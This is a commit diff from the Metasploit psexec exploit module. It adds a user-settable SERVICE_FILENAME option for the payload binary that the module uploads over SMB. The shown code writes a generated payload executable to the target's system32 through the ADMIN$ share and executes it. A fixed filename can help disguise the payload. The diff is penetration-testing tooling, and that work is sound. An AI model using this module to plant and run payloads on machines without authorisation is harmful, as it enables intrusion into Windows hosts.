Land #1804, user-settable filename for psexec

2013-05-31 13:34:52 -05:00 · 2013-05-31 13:34:52 -05:00 · 4f6d80c813
parent 146a30ec4d 5964d36c40
commit 4f6d80c813
1 changed files with 4 additions and 3 deletions
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@ -82,7 +82,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_advanced_options(
 			[
 				OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true]),
-				OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false])
+				OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]),
+				OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil])
 			], self.class)
 	end

@ -124,6 +125,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			report_auth_info(report_hash)
 		end

+		filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
+
 		if datastore['MOF_UPLOAD_METHOD']
 			# payload as exe
 			print_status("Trying wbemexec...")
@ -133,7 +136,6 @@ class Metasploit3 < Msf::Exploit::Remote
 				return
 			end
 			simple.connect("ADMIN$")
-			filename = rand_text_alpha(8) + ".exe"
 			exe = generate_payload_exe
 			fd = smb_open("\\system32\\#{filename}", 'rwct')
 			fd << exe
@ -152,7 +154,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			# Disconnect from the ADMIN$
 			simple.disconnect("ADMIN$")
 		else
-			filename = rand_text_alpha(8) + ".exe"
 			servicename = rand_text_alpha(8)

 			# Upload the shellcode to a file